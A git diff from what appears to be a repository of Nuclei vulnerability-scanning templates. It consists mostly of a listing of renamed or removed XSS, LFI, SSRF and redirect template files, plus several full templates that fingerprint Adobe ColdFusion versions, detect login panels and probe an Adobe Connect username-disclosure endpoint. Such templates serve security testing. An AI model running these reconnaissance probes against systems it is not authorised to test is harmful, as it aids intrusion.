./poc/wordpress/wp-plugin-ad-widget-lfi.yaml ./poc/wordpress/wp-plugin-canto-ssrf.yaml ./poc/wordpress/wp-plugin-info-card-2c6bf7db3c2496dc0c84092a58ea166f.yaml @@ -102186,7 +102177,7 @@ ./poc/wordpress/wp-plugin-utlimate-member-11539.yaml ./poc/wordpress/wp-plugin-utlimate-member-11540.yaml ./poc/wordpress/wp-plugin-utlimate-member-11541.yaml -./poc/wordpress/wp-plugin-utlimate-member.yaml +./poc/wordpress/wp-plugin-utlimate-member-11542.yaml ./poc/wordpress/wp-plugin-wp-with-spritz-lfi.yaml ./poc/wordpress/wp-plugins.yaml ./poc/wordpress/wp-pocket-urls-254217ba23bf67e5ab1f8ee2edeef109.yaml @@ -102213,9 +102204,9 @@ ./poc/wordpress/wp-popup-builder-0c09eb9779aee8d5af8e26f717d75189.yaml ./poc/wordpress/wp-popup-builder-a5f68b9d82c37b214641a19757438e98.yaml ./poc/wordpress/wp-popup-builder.yaml +./poc/wordpress/wp-popup-listing-11543.yaml ./poc/wordpress/wp-popup-listing-11544.yaml ./poc/wordpress/wp-popup-listing-11545.yaml -./poc/wordpress/wp-popup-listing.yaml ./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml ./poc/wordpress/wp-popups-lite-482e13507074a152afd1c369afb2758f.yaml ./poc/wordpress/wp-popups-lite-69ef67ee7aec095c81a6e3175b553ce1.yaml @@ -102369,14 +102360,14 @@ ./poc/wordpress/wp-property-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-property-plugin.yaml ./poc/wordpress/wp-property.yaml -./poc/wordpress/wp-prostore-open-redirect-11546.yaml ./poc/wordpress/wp-prostore-open-redirect-11547.yaml ./poc/wordpress/wp-prostore-open-redirect-11548.yaml ./poc/wordpress/wp-prostore-open-redirect-11549.yaml +./poc/wordpress/wp-prostore-open-redirect-11550.yaml ./poc/wordpress/wp-publications-b85a3c11767227494a836174e6262f5c.yaml ./poc/wordpress/wp-publications.yaml ./poc/wordpress/wp-qards-listing-11551.yaml -./poc/wordpress/wp-qards-listing-11552.yaml +./poc/wordpress/wp-qards-listing.yaml ./poc/wordpress/wp-qrcode-me-v-card-314ed947e5aebc74cf601ba290f4edad.yaml ./poc/wordpress/wp-qrcode-me-v-card.yaml ./poc/wordpress/wp-quick-front-end-editor-02de13f83ec39d9f9fa219b2764f4023.yaml @@ -102541,6 +102532,7 @@ ./poc/wordpress/wp-reviews-plugin-for-google-ef8cb6fc353aaae2bbe90dfc74187793.yaml ./poc/wordpress/wp-reviews-plugin-for-google.yaml ./poc/wordpress/wp-revslider-file-download-11553.yaml +./poc/wordpress/wp-revslider-file-download-11554.yaml ./poc/wordpress/wp-revslider-file-download-11555.yaml ./poc/wordpress/wp-revslider-file-download.yaml ./poc/wordpress/wp-roadmap-7e3122605112af28a9af70aa035a1854.yaml @@ -102618,9 +102610,9 @@ ./poc/wordpress/wp-search-filter.yaml ./poc/wordpress/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/wordpress/wp-search-keyword-redirect.yaml +./poc/wordpress/wp-securimage-xss-11556.yaml ./poc/wordpress/wp-securimage-xss-11558.yaml ./poc/wordpress/wp-securimage-xss-11559.yaml -./poc/wordpress/wp-securimage-xss-11560.yaml ./poc/wordpress/wp-securimage-xss.yaml ./poc/wordpress/wp-security-audit-log-00ed417b21dd63bdfa86736dcf1b985f.yaml ./poc/wordpress/wp-security-audit-log-069819bcca9f4c9d5cccbe176453ccc4.yaml @@ -102701,8 +102693,8 @@ ./poc/wordpress/wp-setup-config.yaml ./poc/wordpress/wp-setup-wizard-8c031e05af523e07598a9fec815c857a.yaml ./poc/wordpress/wp-setup-wizard.yaml -./poc/wordpress/wp-sfwd-lms-listing-11562.yaml ./poc/wordpress/wp-sfwd-lms-listing-11563.yaml +./poc/wordpress/wp-sfwd-lms-listing-11564.yaml ./poc/wordpress/wp-sfwd-lms-listing-11565.yaml ./poc/wordpress/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml ./poc/wordpress/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml @@ -102752,7 +102744,6 @@ ./poc/wordpress/wp-simple-fields-lfi-11566.yaml ./poc/wordpress/wp-simple-fields-lfi-11567.yaml ./poc/wordpress/wp-simple-fields-lfi-11568.yaml -./poc/wordpress/wp-simple-fields-lfi-11569.yaml ./poc/wordpress/wp-simple-fields-lfi-11570.yaml ./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml @@ -102799,8 +102790,8 @@ ./poc/wordpress/wp-sitemap-page.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel.yaml -./poc/wordpress/wp-slideshow-xss-11572.yaml ./poc/wordpress/wp-slideshow-xss-11573.yaml +./poc/wordpress/wp-slideshow-xss-11574.yaml ./poc/wordpress/wp-slideshow-xss-11575.yaml ./poc/wordpress/wp-slideshow-xss-11576.yaml ./poc/wordpress/wp-slideshow-xss.yaml @@ -103348,8 +103339,8 @@ ./poc/wordpress/wp-tutor-lfi-11597.yaml ./poc/wordpress/wp-tutor-lfi-11598.yaml ./poc/wordpress/wp-tutor-lfi-11599.yaml -./poc/wordpress/wp-tutor-lfi-11600.yaml ./poc/wordpress/wp-tutor-lfi-11601.yaml +./poc/wordpress/wp-tutor-lfi.yaml ./poc/wordpress/wp-twilio-core-57a9edaed661bdb0228f355d7457cb63.yaml ./poc/wordpress/wp-twilio-core-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-twilio-core.yaml @@ -103554,6 +103545,7 @@ ./poc/wordpress/wp-vault-lfi-11610.yaml ./poc/wordpress/wp-vault-lfi-11611.yaml ./poc/wordpress/wp-vault-lfi-11612.yaml +./poc/wordpress/wp-vault-local-file-inclusion.yaml ./poc/wordpress/wp-vault-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-vault-plugin.yaml ./poc/wordpress/wp-vault.yaml @@ -103624,6 +103616,7 @@ ./poc/wordpress/wp-whatsapp-chat.yaml ./poc/wordpress/wp-whatsapp.yaml ./poc/wordpress/wp-whmcs-xss-11613.yaml +./poc/wordpress/wp-whmcs-xss-11614.yaml ./poc/wordpress/wp-whmcs-xss.yaml ./poc/wordpress/wp-whois-domain-a87495e38de2f623ebcaa4729c800268.yaml ./poc/wordpress/wp-whois-domain.yaml @@ -103643,8 +103636,8 @@ ./poc/wordpress/wp-woocommerce-email-verification-11618.yaml ./poc/wordpress/wp-woocommerce-email-verification-11619.yaml ./poc/wordpress/wp-woocommerce-email-verification-2.yaml +./poc/wordpress/wp-woocommerce-file-download-11620.yaml ./poc/wordpress/wp-woocommerce-file-download-11621.yaml -./poc/wordpress/wp-woocommerce-file-download.yaml ./poc/wordpress/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/wordpress/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/wordpress/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml @@ -103944,8 +103937,8 @@ ./poc/wordpress/wpdiscuz-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpdiscuz-plugin.yaml ./poc/wordpress/wpdiscuz.yaml +./poc/wordpress/wpdm-cache-session-11436.yaml ./poc/wordpress/wpdm-cache-session-11437.yaml -./poc/wordpress/wpdm-cache-session-11438.yaml ./poc/wordpress/wpdm-cache-session-11439.yaml ./poc/wordpress/wpdm-cache-session.yaml ./poc/wordpress/wpdm-gutenberg-blocks-055c2a59f216ef473b493c568e05a010.yaml @@ -103962,7 +103955,6 @@ ./poc/wordpress/wpe-indoshipping.yaml ./poc/wordpress/wpematico-ec832e52a1347479f81a04d23ebf54b8.yaml ./poc/wordpress/wpematico.yaml -./poc/wordpress/wpengine-config-check.yaml ./poc/wordpress/wpeprivate-config-disclosure.yaml ./poc/wordpress/wpeprivate_leak.yaml ./poc/wordpress/wpforms-12c717c4e562d85a3a1cb61be261222c.yaml @@ -104413,6 +104405,7 @@ ./poc/wordpress/wptouch-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wptouch-e99bc150ef15024383b8cf0e64525f28.yaml ./poc/wordpress/wptouch-fa8996e405ccfd1e139b071450a49a11.yaml +./poc/wordpress/wptouch-open-redirect-11592.yaml ./poc/wordpress/wptouch-open-redirect-11593.yaml ./poc/wordpress/wptouch-open-redirect-11594.yaml ./poc/wordpress/wptouch-open-redirect-11595.yaml @@ -104533,7 +104526,7 @@ ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-1.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10428.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10429.yaml -./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml +./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10432.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-2.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml @@ -104585,9 +104578,7 @@ ./poc/xss/acme-xss-29.yaml ./poc/xss/admin-ajax-xss.yaml ./poc/xss/aem-setpreferences-xss-189.yaml -./poc/xss/aem-setpreferences-xss.yaml -./poc/xss/aem-xss-childlist-selector-197.yaml -./poc/xss/aem-xss-childlist-selector.yaml +./poc/xss/aem-xss-childlist-selector-198.yaml ./poc/xss/aikcms_v2-xss.yaml ./poc/xss/akamai-arl-xss-247.yaml ./poc/xss/akamai-arl-xss-248.yaml @@ -104597,7 +104588,6 @@ ./poc/xss/axublog-goindes-xss.yaml ./poc/xss/basic-xss-prober-695.yaml ./poc/xss/basic-xss-prober-697.yaml -./poc/xss/basic-xss-prober-698.yaml ./poc/xss/basic-xss-prober-699.yaml ./poc/xss/basic-xss-prober.yaml ./poc/xss/bitrix-getmessage-xss.yaml @@ -104626,13 +104616,14 @@ ./poc/xss/clicshopping-v2-xss.yaml ./poc/xss/coldfusion-debug-xss-1.yaml ./poc/xss/coldfusion-debug-xss-1152.yaml +./poc/xss/coldfusion-debug-xss-1153.yaml ./poc/xss/coldfusion-debug-xss-1154.yaml ./poc/xss/coldfusion-debug-xss-2.yaml -./poc/xss/coldfusion-debug-xss.yaml ./poc/xss/concrete-xss-1174.yaml ./poc/xss/concrete-xss-1175.yaml ./poc/xss/concrete-xss-1176.yaml -./poc/xss/concrete-xss-1177.yaml +./poc/xss/concrete-xss-1178.yaml +./poc/xss/concrete-xss.yaml ./poc/xss/concretexss.yaml ./poc/xss/ctp-xss.yaml ./poc/xss/custom-aem-xss.yaml @@ -104653,17 +104644,17 @@ ./poc/xss/drupal_module-fraction-xss-vulnerability.yaml ./poc/xss/eclipse-help-system-xss-7164.yaml ./poc/xss/eclipse-xss.yaml -./poc/xss/elex-woocommerce-xss-7199.yaml ./poc/xss/elex-woocommerce-xss-7200.yaml +./poc/xss/elex-woocommerce-xss.yaml +./poc/xss/empirecms-xss-7218.yaml ./poc/xss/empirecms-xss-7219.yaml -./poc/xss/empirecms-xss-7220.yaml -./poc/xss/empirecms-xss.yaml ./poc/xss/eris-xss.yaml ./poc/xss/exchange-cve-2021-41349-xss.yml ./poc/xss/express-xss.yaml +./poc/xss/feedwordpress-xss-7459.yaml ./poc/xss/feedwordpress-xss-7460.yaml ./poc/xss/feedwordpress-xss.yaml -./poc/xss/flow-flow-social-stream-xss.yaml +./poc/xss/flow-flow-social-stream-xss-7524.yaml ./poc/xss/fuzzing-xss-get-params-html-attribute-injection.yaml ./poc/xss/fuzzing-xss-get-params-html-injection.yaml ./poc/xss/fuzzing-xss-get-params-javascript-context-injection.yaml @@ -104694,7 +104685,6 @@ ./poc/xss/java-melody-xss.yaml ./poc/xss/jenkins-audit-trail-xss.yaml ./poc/xss/jorani-benjamin-xss.yaml -./poc/xss/kafdrop-xss-8411.yaml ./poc/xss/kafdrop-xss-8413.yaml ./poc/xss/kafdrop-xss-8414.yaml ./poc/xss/kafdrop-xss.yaml @@ -104707,6 +104697,7 @@ ./poc/xss/keycloak-xss.yaml ./poc/xss/laravel-ignition-xss-8592.yaml ./poc/xss/laravel-ignition-xss-8593.yaml +./poc/xss/laravel-ignition-xss.yaml ./poc/xss/ldap-wp-login-xss.yaml ./poc/xss/lucee-xss-1.yaml ./poc/xss/lucee-xss-2.yaml @@ -104717,18 +104708,17 @@ ./poc/xss/mida-eframework-xss-8866.yaml ./poc/xss/mida-eframework-xss-8867.yaml ./poc/xss/mida-eframework-xss-8868.yaml +./poc/xss/mida-eframework-xss.yaml ./poc/xss/moodle-auth-xss.yaml ./poc/xss/moodle-filter-jmol-xss-8942.yaml ./poc/xss/moodle-filter-jmol-xss-8943.yaml ./poc/xss/moodle-filter-jmol-xss-8944.yaml ./poc/xss/moodle-filter-jmol-xss-8945.yaml -./poc/xss/moodle-filter-jmol-xss-8946.yaml ./poc/xss/moodle-filter-jmol-xss-8947.yaml ./poc/xss/moodle-filter-jmol-xss.yaml ./poc/xss/moodle-jitsi-plugin-xss.yaml ./poc/xss/moodle-xss-8948.yaml ./poc/xss/moodle-xss-8949.yaml -./poc/xss/moodle-xss-8950.yaml ./poc/xss/moodle-xss-8951.yaml ./poc/xss/moodle-xss-8952.yaml ./poc/xss/ms-exchange-server-reflected-xss-8962.yaml @@ -104754,8 +104744,8 @@ ./poc/xss/oracle-ebs-xss-1.yaml ./poc/xss/oracle-ebs-xss-2.yaml ./poc/xss/oracle-ebs-xss-3.yaml +./poc/xss/oracle-ebs-xss-9373.yaml ./poc/xss/oracle-ebs-xss-9375.yaml -./poc/xss/oracle-ebs-xss-9376.yaml ./poc/xss/oracle-ebs-xss-9377.yaml ./poc/xss/oracle-ebs-xss.yaml ./poc/xss/oracle-oam-xss.yaml @@ -104767,6 +104757,8 @@ ./poc/xss/parentlink-xss-1.yaml ./poc/xss/parentlink-xss-2.yaml ./poc/xss/parentlink-xss-9466.yaml +./poc/xss/parentlink-xss-9467.yaml +./poc/xss/parentlink-xss.yaml ./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml @@ -104777,7 +104769,7 @@ ./poc/xss/pmb-xss.yaml ./poc/xss/qcubed-xss-1.yaml ./poc/xss/qcubed-xss-2.yaml -./poc/xss/qcubed-xss-9749.yaml +./poc/xss/qcubed-xss.yaml ./poc/xss/rails6-xss-9797.yaml ./poc/xss/rails6-xss-9798.yaml ./poc/xss/rails6-xss-9799.yaml @@ -104785,12 +104777,12 @@ ./poc/xss/reflected-xss-apollo.yaml ./poc/xss/reflected-xss.yaml ./poc/xss/rockmongo-xss-9901.yaml -./poc/xss/rockmongo-xss-9902.yaml ./poc/xss/rockmongo-xss-9903.yaml ./poc/xss/rockmongo-xss-9904.yaml +./poc/xss/rxss.yaml +./poc/xss/samsung-wlan-ap-xss-10012.yaml ./poc/xss/samsung-wlan-ap-xss-10013.yaml ./poc/xss/samsung-wlan-ap-xss-10014.yaml -./poc/xss/samsung-wlan-ap-xss.yaml ./poc/xss/sassy-social-share-xss.yaml ./poc/xss/seo-panel-reset-password-xss.yaml ./poc/xss/setPreferences-xss.yaml @@ -104804,11 +104796,12 @@ ./poc/xss/sniplets-xss-10344.yaml ./poc/xss/sniplets-xss-10345.yaml ./poc/xss/sniplets-xss.yaml -./poc/xss/squirrelmail-add-xss.yaml +./poc/xss/squirrelmail-add-xss-10515.yaml ./poc/xss/squirrelmail-vkeyboard-xss-10522.yaml ./poc/xss/swagger-xss.yaml ./poc/xss/t-soft-e-commerce4-urunadi-stored-xss.yaml ./poc/xss/thruk-xss-10758.yaml +./poc/xss/thruk-xss-10759.yaml ./poc/xss/tikiwiki-reflected-xss-1.yaml ./poc/xss/tikiwiki-reflected-xss-10777.yaml ./poc/xss/tikiwiki-reflected-xss-10778.yaml @@ -104818,8 +104811,8 @@ ./poc/xss/tikiwiki-xss.yaml ./poc/xss/top-15-xss.yaml ./poc/xss/top-xss-params-10806.yaml +./poc/xss/top-xss-params-10807.yaml ./poc/xss/top-xss-params-10808.yaml -./poc/xss/top-xss-params-10809.yaml ./poc/xss/top-xss-params.yaml ./poc/xss/turbocrm-xss-10848.yaml ./poc/xss/turbocrm-xss-10849.yaml @@ -104834,16 +104827,15 @@ ./poc/xss/weblogic-servlet-xss.yml ./poc/xss/wems-enterprise-xss.yaml ./poc/xss/wems-manager-xss-11191.yaml +./poc/xss/wems-manager-xss-11192.yaml ./poc/xss/wems-manager-xss-11193.yaml ./poc/xss/wems-manager-xss-11194.yaml -./poc/xss/wems-manager-xss.yaml ./poc/xss/window-name-domxss-11212.yaml +./poc/xss/window-name-domxss-11213.yaml ./poc/xss/window-name-domxss-11214.yaml -./poc/xss/window-name-domxss.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11355.yaml -./poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml ./poc/xss/wordpress-wordfence-xss-11357.yaml ./poc/xss/wordpress-wordfence-xss-11358.yaml ./poc/xss/wordpress-wordfence-xss-11359.yaml @@ -104853,11 +104845,12 @@ ./poc/xss/wordpress-zebra-form-xss-11375.yaml ./poc/xss/wordpress-zebra-form-xss-11376.yaml ./poc/xss/wordpress-zebra-form-xss-11377.yaml -./poc/xss/wordpress-zebra-form-xss-11378.yaml +./poc/xss/wordpress-zebra-form-xss-11379.yaml ./poc/xss/wordpress-zebra-form-xss.yaml ./poc/xss/wp-adaptive-xss-11403.yaml ./poc/xss/wp-adaptive-xss-11404.yaml ./poc/xss/wp-adaptive-xss.yaml +./poc/xss/wp-ambience-xss-11407.yaml ./poc/xss/wp-ambience-xss-11409.yaml ./poc/xss/wp-ambience-xss-11410.yaml ./poc/xss/wp-ambience-xss.yaml @@ -104868,14 +104861,13 @@ ./poc/xss/wp-church-admin-xss-11423.yaml ./poc/xss/wp-church-admin-xss-11424.yaml ./poc/xss/wp-church-admin-xss.yaml -./poc/xss/wp-code-snippets-xss-11425.yaml ./poc/xss/wp-code-snippets-xss-11426.yaml +./poc/xss/wp-code-snippets-xss.yaml ./poc/xss/wp-custom-tables-xss-11431.yaml ./poc/xss/wp-custom-tables-xss-11432.yaml -./poc/xss/wp-custom-tables-xss-11434.yaml +./poc/xss/wp-custom-tables-xss-11433.yaml ./poc/xss/wp-custom-tables-xss-11435.yaml ./poc/xss/wp-custom-tables-xss.yaml -./poc/xss/wp-finder-xss-11445.yaml ./poc/xss/wp-finder-xss-11447.yaml ./poc/xss/wp-finder-xss-11448.yaml ./poc/xss/wp-finder-xss-11449.yaml @@ -104890,14 +104882,13 @@ ./poc/xss/wp-knews-xss-11484.yaml ./poc/xss/wp-knews-xss-11485.yaml ./poc/xss/wp-knews-xss-11486.yaml -./poc/xss/wp-knews-xss-11487.yaml +./poc/xss/wp-knews-xss-11488.yaml ./poc/xss/wp-knews-xss.yaml ./poc/xss/wp-nextgen-xss-11514.yaml ./poc/xss/wp-nextgen-xss-11515.yaml ./poc/xss/wp-nextgen-xss-11516.yaml ./poc/xss/wp-nextgen-xss-11518.yaml ./poc/xss/wp-nextgen-xss.yaml -./poc/xss/wp-phpfreechat-xss-11524.yaml ./poc/xss/wp-phpfreechat-xss-11526.yaml ./poc/xss/wp-phpfreechat-xss-11527.yaml ./poc/xss/wp-phpfreechat-xss-11528.yaml @@ -104906,12 +104897,12 @@ ./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml +./poc/xss/wp-securimage-xss-11556.yaml ./poc/xss/wp-securimage-xss-11558.yaml ./poc/xss/wp-securimage-xss-11559.yaml -./poc/xss/wp-securimage-xss-11560.yaml ./poc/xss/wp-securimage-xss.yaml -./poc/xss/wp-slideshow-xss-11572.yaml ./poc/xss/wp-slideshow-xss-11573.yaml +./poc/xss/wp-slideshow-xss-11574.yaml ./poc/xss/wp-slideshow-xss-11575.yaml ./poc/xss/wp-slideshow-xss-11576.yaml ./poc/xss/wp-slideshow-xss.yaml @@ -104922,6 +104913,7 @@ ./poc/xss/wp-socialfit-xss-11582.yaml ./poc/xss/wp-socialfit-xss.yaml ./poc/xss/wp-whmcs-xss-11613.yaml +./poc/xss/wp-whmcs-xss-11614.yaml ./poc/xss/wp-whmcs-xss.yaml ./poc/xss/wpmudev-my-calender-xss-11503.yaml ./poc/xss/wpmudev-my-calender-xss.yaml diff --git a/poc/adobe/adobe-coldfusion-detect-82.yaml b/poc/adobe/adobe-coldfusion-detect-82.yaml deleted file mode 100644 index 0d9330c87c..0000000000 --- a/poc/adobe/adobe-coldfusion-detect-82.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: adobe-coldfusion-detect - -info: - name: Adobe ColdFusion Detector - author: philippedelteil - severity: info - description: With this template we can detect the version number of Coldfusion instances based on their logos. - tags: adobe,coldfusion - -requests: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" - - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" - - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" - - "{{BaseURL}}/cfide/administrator/images/background.jpg" - - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - - redirects: true - stop-at-first-match: true - max-redirects: 2 - matchers: - - type: dsl - name: "coldfusion-8" - dsl: - - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" - - - type: dsl - name: "coldfusion-9" - dsl: - - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" - - - type: dsl - name: "coldfusion-10" - dsl: - - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" - - - type: dsl - name: "coldfusion-11" - dsl: - - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" - - - type: dsl - name: "coldfusion-2016" - dsl: - - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" - - - type: dsl - name: "coldfusion-2021" - dsl: - - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" - - - type: dsl - name: "coldfusion-2018" - dsl: - - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" - - - type: dsl - name: "coldfusion-mx-7" - dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" diff --git a/poc/adobe/adobe-coldfusion-detect-83.yaml b/poc/adobe/adobe-coldfusion-detect-83.yaml index e19f7d4be2..8bd7130d99 100644 --- a/poc/adobe/adobe-coldfusion-detect-83.yaml +++ b/poc/adobe/adobe-coldfusion-detect-83.yaml @@ -7,11 +7,10 @@ info: description: With this template we can detect the version number of Coldfusion instances based on their logos. metadata: verified: true - max-request: 6 shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion,tech + tags: adobe,coldfusion -http: +requests: - method: GET path: - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" @@ -21,7 +20,7 @@ http: - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - host-redirects: true + redirects: true stop-at-first-match: true max-redirects: 2 matchers: @@ -64,5 +63,3 @@ http: name: "coldfusion-mx-7" dsl: - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" - -# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-coldfusion-error-detect-86.yaml b/poc/adobe/adobe-coldfusion-error-detect-86.yaml new file mode 100644 index 0000000000..57e6f15254 --- /dev/null +++ b/poc/adobe/adobe-coldfusion-error-detect-86.yaml @@ -0,0 +1,29 @@ +id: adobe-coldfusion-error-detect + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect a running ColdFusion instance due to an error page. + reference: + - https://twitter.com/PhilippeDelteil/status/1418622775829348358 + metadata: + verified: true + shodan-query: http.component:"Adobe ColdFusion" + tags: adobe,coldfusion + +requests: + - method: GET + path: + - "{{BaseURL}}/_something_.cfm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ColdFusion documentation' + + - type: status + status: + - 404 diff --git a/poc/adobe/adobe-coldfusion-error-detect-88.yaml b/poc/adobe/adobe-coldfusion-error-detect.yaml similarity index 100% rename from poc/adobe/adobe-coldfusion-error-detect-88.yaml rename to poc/adobe/adobe-coldfusion-error-detect.yaml diff --git a/poc/adobe/adobe-component-login-89.yaml b/poc/adobe/adobe-component-login-89.yaml new file mode 100644 index 0000000000..9b423f9a58 --- /dev/null +++ b/poc/adobe/adobe-component-login-89.yaml @@ -0,0 +1,32 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + description: An Adobe ColdFusion Component Browser login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe,coldfusion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-component-login-90.yaml b/poc/adobe/adobe-component-login-90.yaml deleted file mode 100644 index 1d46e94118..0000000000 --- a/poc/adobe/adobe-component-login-90.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-component-login-91.yaml b/poc/adobe/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/adobe/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-component-login-92.yaml b/poc/adobe/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/adobe/adobe-component-login-92.yaml +++ b/poc/adobe/adobe-component-login-92.yaml @@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/adobe/adobe-connect-central-login-93.yaml b/poc/adobe/adobe-connect-central-login-96.yaml similarity index 100% rename from poc/adobe/adobe-connect-central-login-93.yaml rename to poc/adobe/adobe-connect-central-login-96.yaml diff --git a/poc/adobe/adobe-connect-username-exposure-100.yaml b/poc/adobe/adobe-connect-username-exposure-100.yaml deleted file mode 100644 index 2e4d3089a9..0000000000 --- a/poc/adobe/adobe-connect-username-exposure-100.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - author: dhiyaneshDk - severity: low - reference: - - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/adobe/adobe-connect-username-exposure-101.yaml b/poc/adobe/adobe-connect-username-exposure-101.yaml index e47b4fe88b..088b39ad5e 100644 --- a/poc/adobe/adobe-connect-username-exposure-101.yaml +++ b/poc/adobe/adobe-connect-username-exposure-101.yaml @@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - 